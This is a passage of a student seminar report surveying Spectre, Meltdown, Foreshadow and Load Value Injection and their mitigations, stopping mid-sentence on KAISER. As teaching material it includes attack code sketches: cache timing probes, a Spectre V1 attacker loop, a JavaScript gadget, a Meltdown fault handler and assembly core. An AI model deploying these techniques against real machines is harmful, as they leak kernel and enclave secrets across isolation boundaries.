
seminar report

Seminar: Embedded Systems in summer term 2020

Spectre & Meltdown


A tamed ghost?

Jonas Zeunert
Technische Universität Kaiserslautern, Department of Computer Science

Note: This report is a compilation of publications related to some topic as a result of a student seminar.
It does not claim to introduce original work and all sources should be properly cited.

Spectre and Meltdown are security attacks against the fundamental principles of out-of-order
and speculative execution, features present in processors dating back to 1996.
Even though many people have heard about their impact, their principles are often unknown,
although they are not hard to understand with a bit of background knowledge.
Since programmers are responsible for the security of their own code, it is important for them
to understand exactly at which points their code can be attacked through Spectre vulnerabilities.
In this seminar report we therefore take a detailed look at the principles and techniques used by
Spectre and Meltdown attacks.

1 Introduction
In this seminar report we look at the security vulnerabilities Spectre and Meltdown. They are the
first practical examples of attacks against speculative execution in hardware, discovered in 2018
independently by Google's Project Zero and by Kocher et al. [15], a team including researchers
from Graz University of Technology. Spectre is, as of today, still not fully mitigated, since new
variants keep appearing, while the mitigations which solve the problem behind Meltdown are
sometimes disabled because of their performance impact.

These attacks completely shifted the general awareness of hardware-based attacks, since they are
easily exploitable even from web browsers, whereas side-channel attacks had previously been
regarded as an academic attack vector for breaking cryptographic implementations, not arbitrary
systems.
Their ability to bypass the protection of virtual machines and sandboxes makes them extremely
relevant in view of the continuously growing cloud computing market, and therefore a big threat
to all such systems.

We try to get an understanding of the history of the attacks, their impact, their functionality
and their mitigations, and we try to answer the question whether this new ghost that appeared in
the security realm has been tamed by the measures taken so far, or whether it is something that
will haunt us for a much longer time.

The rest of this paper is structured as follows: First, section 2 provides the necessary technical
background. This covers the basics of caches, side-channel attacks, speculative execution and
the other concepts needed to understand the attacks. Section 3 then covers the history and
evolution of the attacks: how the first side-channel attacks were discovered, how everything
evolved to today's state, and what impact this had.
Section 4 takes a look at the actual ideas behind Spectre and Meltdown and how they work.
Afterwards, section 5 discusses possible mitigations from both a software (5.1) and a hardware
(5.2) perspective. Finally, section 6 discusses whether it was possible to tame the ghost introduced
with Spectre and Meltdown.

2 Technical Background
Before describing how Spectre and Meltdown work in detail, it is necessary to understand the
underlying techniques that are combined in Spectre-like attacks.

In this section we take a look at the principles of caches, side-channel attacks, out-of-order
execution and branch prediction.

2.1 CPU Cache


A CPU cache is a small but very fast memory in a computer system, located near the execution
units of the CPU. Its main purpose is to cache frequently used data so that it does not have to
be read from and written back to main memory immediately, which for Von Neumann machines
is the biggest bottleneck in computation.

Modern CPUs typically have three levels of caches, which are increasingly closer to the ALU;
this makes accesses faster but also shrinks the possible size. As an example of a modern cache
structure, an AMD Ryzen 9 3900 [2] has 32 KiB of level 1 cache and 512 KiB of level 2 cache
per core. The level 3 cache is typically shared between all cores and holds about 64 MiB.

A cache is organized in lines and sets. A line contains multiple bytes of data, while the sets
group the lines. This organization maps any given main memory address to a cache line and is
important to understand for the different side-channel attacks.
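As a small illustration of this mapping, the following C sketch computes which byte of a line and
which set a given address falls into, for a hypothetical cache geometry with 64-byte lines and 64
sets (the concrete parameters depend on the CPU and the cache level):

    #include <stdint.h>
    #include <stdio.h>

    /* Hypothetical geometry: 64-byte lines, 64 sets, e.g. a 32 KiB,
       8-way set-associative L1 data cache. Real values depend on the CPU. */
    #define LINE_SIZE 64
    #define NUM_SETS  64

    int main(void) {
        uintptr_t addr = 0x7ffd1234abcd;                      /* some virtual address */
        uintptr_t offset_in_line = addr % LINE_SIZE;          /* byte within the cache line */
        uintptr_t set_index = (addr / LINE_SIZE) % NUM_SETS;  /* set this line maps to */
        printf("offset in line: %lu, set index: %lu\n",
               (unsigned long)offset_in_line, (unsigned long)set_index);
        return 0;
    }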

2.2 Side-channel attacks


Let us first get a definition of the term:

    A side-channel attack is an attack enabled by leakage of information from a physical
    cryptosystem by an unintended channel. Characteristics that could be exploited in
    a side-channel attack include timing, power consumption, and electromagnetic and
    acoustic emissions. [22]

So we see that it is important for a side-channel attack that some (here cryptographic) information
is leaked over a channel that was not intended to leak information. Often the channel, such as
power consumption, is not even intended to communicate any information at all.

Standaert [25] goes further and subdivides side-channel attacks into invasive or non-invasive
and active or passive. (Non-)invasiveness describes whether the attack requires direct access to
the physical chip, while active versus passive distinguishes whether the attack changes the
functionality of the original algorithm or not. As an example, different attacks are classified
according to this scheme in figure 1.

           Invasive                               Non-Invasive
Active     Inducing signals on a device to        Flipping bits via a technique like
           get back information                   Rowhammer [13] to break page separation
Passive    Sensing the data on the DRAM bus       Sensing electromagnetic signals
                                                  emitted by a machine

Figure 1: Examples for the side-channel classification according to Standaert (2010) [25]

Since this domain is really large, we concentrate in this paper on the non-invasive techniques of
cache-based side-channel attacks, which are the essential building blocks behind Spectre and also
Meltdown.

2.3 Cache based side-channel attacks


Cache-based side-channel attacks can be classified in the scheme above as non-invasive, passive
attacks. Since they are only based on accessing the cache, which does not require any direct
physical interaction, they are non-invasive, and even though they manipulate the cache state,
this does not directly change the behaviour of any program, so they are passive.

Most often they rely on the ability of the cache to decrease the time of memory accesses, which
are, compared to accesses to registers located near the execution units, really slow. If a given
piece of data is already in the cache, the execution of an algorithm is much faster than if it were
not. This timing difference allows drawing conclusions about the accessed address, and therefore
about the actual data, given that the algorithm is known.

Even though many cache-based side-channel attacks are known today, it is sufficient to
concentrate on the following three, which are also used by Kocher et al. [15] in the original
Spectre paper: Flush+Reload (2.3.1), Evict+Reload (2.3.2) and Prime+Probe (2.3.3).

2.3.1 Flush+Reload
Flush+Reload, introduced by Yarom and Falkner [29], is an attack which uses the clflush
instruction of the x86 architecture, which evicts a given cache line from all cache levels. It also
relies on the ability of modern operating systems to share memory pages between processes and,
in its more aggressive form, on memory de-duplication, where arbitrary identical-looking pages
are shared.

Basically, Flush+Reload works in three phases:

1. Flush the observed cache line with clflush
2. Wait for the victim to access the cache line
3. Probe the cache timing of the memory line by reading the shared data and measuring the
   access time

The most critical part of this is the waiting time: if one probes too early or too late, or exactly
at the same time as the victim, information can be missed. Also, this only works if the memory
pages are shared, so an attacker can for example only observe accesses to a shared library that
is mapped into both processes.
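To illustrate the flush and reload phases, the following minimal C sketch for x86 (using compiler
intrinsics; the timing threshold is an assumption that has to be calibrated for the concrete
machine) measures whether a shared address was served from the cache, which indicates that
the victim accessed it since the last flush:

    #include <stdint.h>
    #include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

    #define HIT_THRESHOLD 100   /* cycles; must be calibrated per machine */

    /* Returns 1 if *addr was cached, i.e. the victim probably touched it
       since the last flush, and flushes it again for the next round. */
    static int reload_was_hit(volatile uint8_t *addr) {
        unsigned int aux;
        _mm_mfence();                      /* order the timed access */
        uint64_t start = __rdtscp(&aux);
        (void)*addr;                       /* the timed access */
        uint64_t end = __rdtscp(&aux);
        _mm_clflush((void *)addr);         /* flush phase for the next measurement */
        return (end - start) < HIT_THRESHOLD;
    }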

2.3.2 Evict+Reload
Evict+Reload is a refinement of Flush+Reload by Gruss et al. [11]. Instead of flushing the
targeted cache line with clflush, it evicts it by accessing congruent addresses, and it generalizes
the approach so that not only specific binaries can be attacked; instead, arbitrary information
can be read from the cache.
The attack is based on templates which are automatically generated by profiling the cache-hit
ratio of a specific event, such as a keystroke, which the attacker wants to catch. This generated
template is afterwards matched against the timings of other program instantiations, so that the
attacker can recover arbitrary data for which a profile exists.

2.3.3 Prime+Probe
Prime+Probe, first described by Osvik et al. [21] in 2006 as a first-level cache attack against AES,
was further investigated by Liu et al. [18] in 2015, who showed that the attack is also practical
on last-level caches. This can, for example, be used to extract data across virtual machines.
The idea behind Prime+Probe is that the attacker first primes the cache by filling the monitored
cache sets with his own data, then idles for a while, and at the end probes which of his cache
lines have been replaced; from this he can draw conclusions about which memory addresses the
victim accessed.

With this information an attacker can, as in the attacks above, draw conclusions about the key
used in a specific implementation of, e.g., GnuPG, and sometimes this is enough to recover the
whole secret.
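A rough C sketch of the prime and probe phases for a single monitored cache set could look as
follows (the eviction set, i.e. a group of attacker addresses that all map to the same cache set,
is assumed to be already constructed, which in practice is a separate step; WAYS and the timing
threshold are assumptions):

    #include <stdint.h>
    #include <x86intrin.h>   /* __rdtscp */

    #define WAYS 8   /* assumed associativity of the monitored cache */

    /* eviction_set: WAYS addresses that all map to the monitored cache set */
    static void prime(volatile uint8_t *eviction_set[WAYS]) {
        for (int i = 0; i < WAYS; i++)
            (void)*eviction_set[i];        /* fill the set with attacker data */
    }

    /* Returns the total reload time; a value above a calibrated threshold means
       that the victim evicted some of our lines, i.e. it accessed the set. */
    static uint64_t probe(volatile uint8_t *eviction_set[WAYS]) {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        for (int i = 0; i < WAYS; i++)
            (void)*eviction_set[i];
        uint64_t end = __rdtscp(&aux);
        return end - start;
    }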

2.4 Out-of-order execution


Out-of-order execution is another technique that has been used for many years to speed up
computation by executing code not strictly in the order in which it was programmed and compiled.
If some instructions have no dependencies between their computations and multiple arithmetic
logic units (ALUs) are at disposal, it is possible to run them in parallel on the micro-architectural
level.

The most important property of out-of-order execution is that it must be transparent with
respect to the original intent of the code. From the perspective of the programmer it should look
as if the code were executed in order, and there should be no hazards.

2.5 Branch prediction


One of the biggest speed improvements in today's processors was the introduction of branch
prediction, which enables speculative execution. It increases the flow of instructions in multi-stage
pipelines by filling "holes" which arise due to conditional branches in the code.

In more detail: when there is a conditional branch, the processor would normally have to halt
its execution until it knows the outcome of the branch before it can continue with further
instructions. This creates bubbles in the pipeline, which hurts performance since the processor
cannot do anything useful in these cycles. Therefore the branch predictor of the CPU predicts
the outcome with a given strategy (which could be, for example, "always take the branch") and
continues computing as if the prediction were correct. When the real result of the branch arrives,
the CPU either discards all speculative calculations, if the prediction was wrong, or it has saved
a lot of cycles. This is especially important for loop branches, where a good prediction can make
a big performance difference.

A loop of the kind often found in real code is the one seen in figure 2, written exemplarily in C.
As one can easily see, the loop condition will be true 100 times, so the strategy "always predict
taken" would lead to only a single misprediction at the 101st evaluation, while otherwise the
CPU can keep as many execution units busy as it has at hand. (In a real environment a compiler
would typically speed up this loop by simply unrolling it, which would then be accelerated by
out-of-order execution.)

for (int i = 0; i < 100; i++) {
    array[i] = i;
}

Figure 2: Example loop which can be accelerated by branch prediction.

Modern CPUs have a dynamic branch predictor which trains itself with the branches observed in
the past. For example, if a given branch was taken the last ten times, it is likely that it will also
be taken the eleventh time. It is very important, however, that all traces of this behaviour are
reverted if the prediction was wrong, such as register values and stalled memory write-backs.
For the caches this does not happen, which is what enables Spectre and Meltdown like attacks.

2.6 Return-oriented programming


Return-oriented programming is a technique for exploiting buffer-overflow vulnerabilities in the
presence of several security techniques like W^X or Address Space Layout Randomization
(ASLR).
In an unprotected environment the attacker would overflow the stack with the payload he wants
to be executed. Since several defense mechanisms prevent such attacks, with return-oriented
programming the attacker instead only overwrites the function's return address, which is normally
pushed onto the stack, and tries to find gadgets in the existing code to jump to, where he can
either execute arbitrary instructions or call a library function which loads his own code.
By chaining such so-called "gadgets" it is possible to execute arbitrary code.

3 History and Evolution


The first side-channel attack known in the academic world in modern times, called "Tempest",
reaches back to 1943, when a researcher at Bell Telephone Laboratories discovered that the
operation of a cryptographic teletype caused spikes on a nearby oscilloscope which could be
translated back into the transmitted message. [6]

Afterwards the topic's attention faded a bit, until Paul Kocher released his paper about
"Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS and Other Systems" in
1996 [16], which brought such types of attacks back into focus.
There were many speculations about how these types of attacks could become practical until,
in 2003, Tsunoo et al. [26] showed how to significantly reduce the complexity of breaking the
then state-of-the-art Data Encryption Standard (DES) with cache attacks.

Afterwards many different side channels such as electromagnetic radiation, power consumption
or micro-architectural caches were exploited, which finally led to the so far biggest chapter of
this history: the release of Spectre and Meltdown, found at the same time by Kocher et al. [15]
and Lipp et al. [17] and by Jann Horn of Google Project Zero.

This finally opened Pandora's box, because afterwards many similar attacks were found and new
variants are released continuously.
These include eight different attacks called Spectre-NG, which were first reported by the German
computer magazine c't in May 2018 [12]. They are further attacks exploiting speculative execution
like Spectre, but with quite different characteristics: in one of them the attacker does not need
to have control over any memory of the attacked program, and in the case of NetSpectre [24],
released in July 2018, the attacker does not even need to run code on the remote machine at all
but only uses common network functionality.

In August 2018 another big discovery called Foreshadow (found in January 2018 by Van Bulck
et al. [27]) was released, which, similarly to Spectre, attacks the SGX enclaves of Intel processors,
which were until this point in time considered a totally secure execution platform for holding
secrets that even the machine's owner should not be able to access.

Furthermore, in 2020 Load Value Injection was discovered by Van Bulck et al. [28], which
combines the faults of Intel processors with the techniques of Spectre to inject attacker-controlled
data into arbitrary load instructions.

Most recently, in August 2020, the researchers behind the Foreshadow attack published a
comment stating that all mitigations against the Spectre attacks are based on an incomplete
understanding of the principles that lie behind them, and that until the fundamental problems
are fixed there will always be new Spectre-like attacks. [4]

3.1 Impact
As we have seen in the previous section, the discovery of Spectre and Meltdown has brought a
lot of attention to the topic of side-channel attacks and speculative execution. It completely
discarded the widespread assumption that the underlying hardware executes correctly and that
attacks against it are only of academic nature. Before, security researchers had mostly focused
on finding and exploiting bugs in software.

Figure 3: Evolution of Spectre-like security flaws as shown in "A Systematic Evaluation of
Transient Execution Attacks and Defenses" by Canella et al. [3]

The original Spectre and Meltdown papers led to a wide range of similar attacks, as shown in
figure 3. The figure summarizes the systematic analysis of Spectre and Meltdown attacks by
Canella et al.: since so many varieties appeared after the initial release, they followed a systematic
approach to find all possible combinations of the attacks. The variants highlighted in blue already
exist, while the ones in red should be possible but have not been demonstrated yet.

Since speculative execution has been present in commercial CPUs since the 1990s and the
Meltdown vulnerability affects Intel processors starting from 2011, fixing these problems in
hardware will require replacing nearly every CPU in use today, and one can easily imagine how
long this will take once a processor architecture is found that is not vulnerable to Spectre attacks.

Besides introducing a completely new attack vector on computer systems, the mitigations also
have an impact of their own, which becomes especially relevant in large-scale data centers. The
performance hit highly depends on the hardware configuration as well as on the algorithms used,
since most patches change the microcode of the processor. [14] So one cannot derive a simple
formula of the form patch = x% performance impact, but it is possible to say that the performance
impact of the patches lies somewhere between 1% and 20%. This is less than the initially feared
40%-60%, but still enough that it is often weighed whether fully mitigating the vulnerabilities is
worthwhile.

4 Functionality
Spectre as well as Meltdown (the latter sometimes also called Spectre V3 because of its
similarities) work by exploiting some form of out-of-order execution which leaves unintended
traces in the processor caches. While Spectre is an attack against binaries that relies on finding
specific usable gadgets, Meltdown is more a fault attack against the implementation of Intel
processors and some ARM processors.

Both of them detect traces in the CPU's cache left by out-of-order execution. These traces exist
because speculatively executed operations are only reverted in memory, registers and pipelines,
but not in the caches, since the cache is a separate unit of the CPU and does not get informed
that an operation was reverted. This creates a side channel which can be read out by an attacker.

So in general these attacks can be split up into three main steps:

1. Bring the cache into a known, homogeneous state
2. Trick the CPU into speculatively executing something not intended
3. Read out the data left over in the cache through timing attacks

We will discuss this general approach in more detail by investigating the main variants of the
security breaches: Spectre V1 (4.1.1), Spectre V2 (4.1.2), Meltdown (4.2), Foreshadow (4.3),
which is a development of Meltdown, and Load Value Injection (4.4), which combines the
approaches.
4.1 Spectre
As already stated, Spectre is an attack against a binary, so in order to leak information one has
to analyze a program (most often a shared library) and find specific instruction sequences. The
main requirement is that these instructions somehow alter memory and therefore also the cache,
as for example an x86 "mov" instruction does.
Also, some kind of speculative execution must be involved: for Spectre V1 this is just a conditional
branch, while Spectre V2 uses indirect branches, such as those arising from calls through function
pointers or function returns, which also trigger speculative execution and occur in almost every
program.

Even though there are many more variants of Spectre, each exploiting a different behaviour of
programs in its own way, it is sufficient to understand the two released in the first paper; even
though they are not the most sophisticated ones, they give a good understanding of what went
wrong.
The first variant, called Spectre V1, exploits the misprediction of conditional branches. The
second variant (Spectre V2) exploits the poisoning of indirect branches. Both are discussed in
the following sections.

4.1.1 Exploiting Conditional Branch Misprediction (Spectre V1)


Let us look in detail at how a Spectre V1 exploit works. For Spectre V1 the code flow must
contain a conditional branch that triggers speculative execution. Figure 4 shows a typical code
sequence that can be misused for Spectre V1 attacks and that an attacker could find in a shared
library, in kernel code or maybe in the implementation of a browser where he can execute some
JavaScript.

In general such an attack consists of the following steps:

At first the attacker trains the branch predictor by calling the function multiple times with
in-bounds values of x. This leads to a situation where the CPU assumes that the conditional
branch is always true and assumes this also for the next call.
Afterwards it is necessary to bring the cache into a homogeneous state known to the attacker,
either by erasing the relevant lines with the clflush instruction on x86 machines or by filling
them with known data, in order to start a Flush+Reload or, correspondingly, a Prime+Probe
attack after the speculative execution.
Then the attack begins and the function is called with an out-of-bounds value of x. Since the
branch predictor was trained to assume the branch is true and the cache was flushed, so that
the size of array1 is not cached, the CPU speculatively executes the next line while still waiting
for array1_size and loads the entry of array2 indexed by array1[x] into the cache.
When the value of array1_size arrives, everything gets reverted, but the attacker can start
probing array2: he checks the access timings of array2 for each of the 256 possible values of
array1[x]. Only a single one of these accesses will be fast, and its index is the value of array1[x],
which was not known to the attacker beforehand.
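A minimal C sketch of the attacker side could look as follows (victim_function wraps the code
from figure 4; flush_array2 and reload_and_time are hypothetical helpers that implement the
flush and timing steps of a Flush+Reload probe as sketched in section 2.3.1; public
proof-of-concept code such as [5] follows the same structure):

    #include <stddef.h>

    extern void victim_function(size_t x);          /* wraps the code from figure 4 */
    extern void flush_array2(void);                  /* clflush every probed line of array2 */
    extern int  reload_and_time(int byte_value);     /* 1 if array2[byte_value * 256] is cached */

    /* Try to recover array1[malicious_x], a byte outside the bounds of array1. */
    static int leak_byte(size_t malicious_x) {
        for (int round = 0; round < 1000; round++) {
            /* 1. train the branch predictor with in-bounds values */
            for (size_t i = 0; i < 30; i++)
                victim_function(i % 16);

            /* 2. flush array2 (and array1_size) so the bounds check stalls */
            flush_array2();

            /* 3. trigger the misprediction with the out-of-bounds index */
            victim_function(malicious_x);

            /* 4. probe: exactly one of the 256 candidate lines should be hot */
            for (int value = 0; value < 256; value++)
                if (reload_and_time(value))
                    return value;
        }
        return -1;   /* no stable signal observed */
    }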

Even though this attack requires a comprehensive understanding of the attacked software, it is
more than viable against widely used software like web browsers, operating systems or
safety-critical systems like encryption software.

if (x < array1_size)
    y = array2[array1[x] * 256];

Figure 4: A typical Spectre V1 code flow where the attacker is in control of x

To also show such an approach, figure 5 contains an example implementation of how Spectre can
even be exploited in a scripting language like JavaScript, which can be used to bypass the
sandboxing of modern browsers.

if (index < simpleByteArray.length) {
    index = simpleByteArray[index | 0];
    index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0;
    localJunk ^= probeTable[index|0]|0;
}

Figure 5: Implementation of a Spectre V1 attack in JavaScript.

In the example the constant TABLE1_STRIDE is 4096 and TABLE1_BYTES is 2^25. First the
branch predictor is trained by calling this code snippet about 1000 times with in-range values
and then, in the last call, with a value out of bounds.
The variable localJunk is only there so that the JIT compiler of the JavaScript engine does not
optimize the operations away, and the "|0" hints to it that the resulting value is an integer.
With this the speculative execution is triggered, and the attacker has to read out the value
afterwards, which is not that simple in JavaScript since there is no instruction like CLFLUSH
that can be called.
But the cache can also be evicted by reading a series of addresses at 4096-byte intervals out of
a large array. Afterwards the secret value can be read out from the cache status of
probeTable[n*4096] with n in the interval [0, 255].

4.1.2 Poisoning Indirect Branches

Poisoning indirect branches, also known as Spectre V2, is a technique that is more general than
exploiting conditional branch mispredictions, since it does not require an exploitable conditional
branch but instead uses indirect branches, for example those emerging from calls through function
pointers or from function returns.
More often than not, a jump to a function in program code depends on a register or memory
value. So when the attacker is able to evict that value from the cache before the indirect jump,
the CPU has to wait for it and meanwhile speculates on the jump target instead of using the
value that is actually written in the register of the indirect jump. Most often the reachable code
is limited to the memory range of the victim process, but this can lead to situations where
execution takes directions which would never occur in normal program flow.

class Base {
 public:
    virtual void Foo() = 0;
};

class Derived : public Base {
 public:
    void Foo() override { /* ... */ }
};

Base* obj = new Derived;
obj->Foo();

Figure 6: Example C++ code which leads to an indirect branch that could be exploited for
Spectre V2.

A C++ example which gives an idea of when an indirect branch occurs is shown in figure 6.
When overriding a virtual function of a base class and calling it through a pointer to the base
class, the system has to look up the address of the function in memory from the virtual function
table, since it is not known at compile time. The resulting indirect branch can be exploited by an
attacker to load arbitrary data from the program into the cache while the CPU is waiting for the
real target address.

To better predict such indirect branches, the branch predictor of the CPU utilizes buffers such
as the branch target buffer and the branch history buffer, which keep track of recent indirect
jumps and their targets. The attacker trains them beforehand by performing indirect branches
to attacker-chosen addresses, thus tricking the predictor into jumping to a gadget not intended
by the original program. From there, load instructions are executed which somehow alter the
state of the cache.
This procedure is quite similar to the return-oriented programming described above, and even
though the executed sequence is limited in its execution time, it neither needs to terminate
cleanly, since the CPU revokes the speculative execution, nor does it leave traces, because the
attacked information is received via side channels.

The rest of the attack works similarly to Spectre V1, by reading out the traces left in the cache
with cache-based side-channel attacks.

4.2 Meltdown
Meltdown, sometimes also called Spectre V3, found by Lipp et al. in 2018 [17], is an attack which
works only on Intel processors (dating back to at least 2011) and on some ARM processors. It
focuses on reading kernel memory from an arbitrary user-space process by exploiting an
architectural fault in these processors. The main flaw behind Meltdown is the assumption that
when something is executed out of order and gets discarded due to an exception, everything
gets reverted; during the transient execution there are no further checks protecting the memory,
so arbitrary addresses can be read.

raise_exception();
// the line below is never reached
access(probe_array[data * 4096]);

Figure 7: A pseudo-code example of the mechanism behind Meltdown.

We can analyze this behaviour with the simple pseudo-code example in figure 7, which shows
what goes wrong in a CPU when a Meltdown attack is executed. In affected processors, when
an exception occurs, the next instruction may nevertheless already have been executed because
of out-of-order execution. Even though the results get reverted in memory and registers, this
does not happen in the cache, because the cache is its own subsystem, and an attacker can read
it out through a cache-based side-channel attack such as Prime+Probe (2.3.3).
Meltdown bypasses all software and hardware defense features which were implemented until the
day of its release, such as (Kernel) Address Space Layout Randomization ((K)ASLR) or
CPU-based features like Supervisor Mode Access Prevention (SMAP) or No-Execute (NX).

Figure 8: The complete physical memory is mapped at an offset into kernel space, as indicated
by the blue address.

To see why arbitrary addresses can be read out, figure 8 shows that all physical addresses are
mapped into kernel space, because the kernel typically has to perform actions on user memory
pages.

In more detail: when we read arbitrary memory that is not in our address range, an exception is
triggered, and the kernel handles the resulting segmentation fault by terminating the process
that tried to read the protected memory. Therefore this behaviour must be handled by the
attacking process, otherwise it gets terminated. There are two different possibilities to handle
this:

The first, trivial approach is to handle the exception by forking the attacking process just before
the memory access. The forked child gets killed, and the parent process can thereafter read out
the cache. Since forking is a bit costly, it is usually better to just install a signal handler that
catches the fault.
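A minimal sketch of the signal-handler variant in C could look as follows (the transient access
and the subsequent Flush+Reload probing are only indicated; the kernel address used here is a
hypothetical placeholder):

    #include <setjmp.h>
    #include <signal.h>
    #include <stdio.h>

    static sigjmp_buf recovery_point;

    static void segfault_handler(int sig) {
        (void)sig;
        /* jump back into the attacker's control flow instead of dying */
        siglongjmp(recovery_point, 1);
    }

    int main(void) {
        signal(SIGSEGV, segfault_handler);

        if (sigsetjmp(recovery_point, 1) == 0) {
            /* the faulting (and transiently executed) kernel read would go here */
            volatile char secret = *(volatile char *)0xffff888000000000ULL;  /* hypothetical kernel address */
            (void)secret;
        } else {
            /* the exception was caught; now probe the cache with Flush+Reload */
            puts("survived the fault, probing the cache ...");
        }
        return 0;
    }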

The other approach is to trick the processor into executing the memory read only speculatively,
by placing it behind a branch and training the branch predictor accordingly. This leads to a
situation where the faulting access only happens transiently, so the exception is never raised
architecturally and normal execution simply continues.

Combining all this, the Meltdown procedure works as follows:

1. An arbitrary memory address which is inaccessible to the attacker is read into a register
2. The value at that address is transiently used as an index into a probe array, and the
   occurring exception is handled
3. With Flush+Reload the content of the probe array is read out by the attacker

The above can be repeated for arbitrary memory, so that in the end an attacker is able to read
out the whole physical memory of a system.

The attack usually translates to the assembly sequence shown in figure 9, which is the core
sequence of Meltdown attacks.

1 ; rcx = kernel address
2 ; rbx = probe array
3 retry:
4 mov al, byte [rcx]
5 shl rax, 0xc
6 jz retry
7 mov rbx, qword [rbx + rax]

Figure 9: Core instruction sequence of Meltdown.

Register RCX holds the kernel address which should be read out, and RBX holds the probe array
which constructs the side channel. In line 4 the byte at the kernel address in RCX gets loaded
into AL (which represents the least significant byte of RAX). This access leads to an exception,
but there is a race condition between the raising of the exception and the transmission of the
secret in line 7.
The shift in line 5 multiplies the value of the read byte by the page size. With a page size of
4 KiB, the probe array is 256 x 4096 bytes large for reading a single byte; this ensures that the
prefetching of memory does not load neighboring addresses and create noise when reading out
the value. The retry loop in line 6 additionally keeps the pipeline busy if a zero was read, which
delays the abort of the transient execution as much as possible. In line 7 the secret-dependent
element of the probe array in RBX is finally accessed.

On the micro-architectural level the instruction in line 7 races against the exception, and even
though everything gets reverted afterwards, there is a high probability that the access to the
probe array happens first.
Now the attacker just has to probe the timings of the probe array pointed to by RBX to see
which element is cached, and thereby obtains the value stored at the kernel address.

Since every physical address is somehow mapped into kernel memory, the above steps just have
to be repeated for every possible address, and it is possible to read out the whole memory at a
bandwidth of about 3.2 KB/s up to 503 KB/s.

4.3 Foreshadow
Foreshadow, discovered by Van Bulck et al. [27], is, like Meltdown, an attack that is only viable
on Intel CPUs and especially targets the SGX secure enclaves, a feature to protect the execution
of user software. It allows an attacker not only to read out the whole memory of an enclave
(which should not be possible) but also to steal its private keys and thereby break it completely.

The attack works similarly to Meltdown and is classified by Intel as an "L1 Terminal Fault". The
problem with accessing SGX memory is that an unprivileged access to it does not raise an
exception as in Meltdown; instead the returned value is replaced by a dummy value. Therefore
the race condition between exception and memory read used by Meltdown cannot be exploited
directly.
To counter this, the attackers revoke all access to the page they want to read by a call to the
mprotect system call. This clears the present bit of the page-table entry, so that an exception is
thrown again. Now the real value lies in the L1 cache and can be read out through a side channel
like Flush+Reload, as in the Meltdown attack.
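As a small illustration of this preparation step, the following C sketch (leaving out all SGX
specifics) marks a page as inaccessible with mprotect, so that a subsequent access faults instead
of returning normally:

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/mman.h>
    #include <unistd.h>

    int main(void) {
        long page_size = sysconf(_SC_PAGESIZE);

        /* a stand-in for the page the attacker wants to target */
        void *page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED) { perror("mmap"); return EXIT_FAILURE; }

        /* revoke all access: the page-table permissions are cleared, so any
           further access raises a fault and can only happen transiently */
        if (mprotect(page, page_size, PROT_NONE) != 0) {
            perror("mprotect");
            return EXIT_FAILURE;
        }

        printf("page %p is now inaccessible\n", page);
        return 0;
    }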

4.4 Load Value Injection


Load Value Injection, researched by Van Bulck et al. [28] and published in 2020, is a technique
which combines Spectre-like code gadgets with Meltdown-style data leakage. The attack proceeds
entirely within the victim's address space and thereby bypasses most of the mitigations against
Meltdown, such as KAISER, which will be explained in section 5.1.1.

The general approach can be seen in figure 10. An illegal value controlled by the attacker is
loaded into a micro-architectural buffer, which prepares the attack. As a result, when the victim
tries to access the value B, the attacker's value A is illegally served from the buffer instead. The
CPU then transiently executes instructions depending on the gadget that lies at A.

Figure 10: The general approach of LVI as shown in "LVI: Hijacking Transient Execution through
Microarchitectural Load Value Injection" [28]

A toy example of the kind of code structure that is needed can be seen in figure 11: first, in
line 2, a value controlled by the attacker gets stored, and afterwards a page fault occurs when
dereferencing the double pointer in line 3, which leads to the transient use of the attacker's value.

1 void call_victim(size_t untrusted_arg) {
2     *arg_copy = untrusted_arg;
3     array[**trusted_ptr * 4096];
4 }

Figure 11: Example of LVI-attackable code.

The authors state that potentially every load instruction can be turned into an LVI attack, and
that a defense against this attack requires an orthogonal approach combining defenses against
both Spectre and Meltdown.

5 Mitigations
There are several mitigations that were developed and applied to operating systems, compilers
and software directly after the release of the vulnerabilities, thanks to the responsible-disclosure
period. Some of them caused big trouble early on and had to be reverted and revised, like the
first Meltdown patch for Microsoft Windows 7, which enabled an attacker to even write to
arbitrary memory regions. [7] They protect against the most critical parts of the attacks described
in the papers, but it has been claimed multiple times that they do not solve the underlying issues
of Spectre and Meltdown, which can only be fixed in hardware, something that has not happened
to this day.

In general one can classify the mitigations into three kinds: [23]

1. Reducing the accuracy of the covert-channel communication, up to eliminating it, or making
   gadgets unavailable, which for example was done by the web-browser manufacturers (5.1.4)
2. Aborting or preventing transient execution when accessing secrets (an example here is
   retpoline, 5.1.3)
3. Ensuring that secret data is unavailable, which is what the KAISER patch (5.1.1) does

In this chapter we will discuss software patches such as KAISER (5.1.1) and retpoline (5.1.3),
which help protect software against data leakage, and also discuss a complete in-hardware
approach to finally fix the issues (5.2).

5.1 Software Mitigations


5.1.1 KAISER
KAISER, developed by Gruss et al. [10], is an operating system patch mitigating only the
Meltdown vulnerability by removing the mapping of kernel memory from the address space of
user processes. This strictly separates user space from kernel space, and therefore it is no longer
possible to leak kernel data through Meltdown.

It is a development of KASLR, which hardens the exploitation of bugs by randomizing the kernel
memory layout, and it is also recommended by the authors of the Meltdown paper to be
implemented in all operating system kernels.

There are several challenges to overcome when isolating the memory ranges of user space and
kernel space.
The first problem are threads, which are heavily used in modern parallel programming, because
if the memory page structure is modified upon a context switch, this affects all other threads
running in the same program.
Furthermore, there are several memory regions which must be shared between kernel and user
space, and completely unmapping user space from kernel space would require rewriting large
parts of current kernels.

The last challenge is more a performance one, because switching the address space requires the
Translation Lookaside Buffer (TLB), which caches the mapping of virtual to physical memory
addresses, to be flushed, which is a quite expensive operation and is nowadays optimized to
happen as rarely as possible.

KAISER is a patch which overcomes these challenges through multiple different approaches while
reducing the overhead to a performance impact of only 0.28%.

To overcome the first problem, it introduces shadow address spaces, which maintain the parallel
kernel and user mappings by giving every process two separate address spaces that are switched
as needed on a context switch by updating the corresponding register CR3.
The second problem is solved by KAISER by keeping only the most necessary memory regions
of kernel space mapped into user space and vice versa. These include the interrupt descriptor
table, the global descriptor table, the task state segment and finally the thread stacks. Even
though kernel space is nearly entirely removed from user space, the same does not apply to user
space in the kernel: the authors found unmapping it impractical, since most operating systems
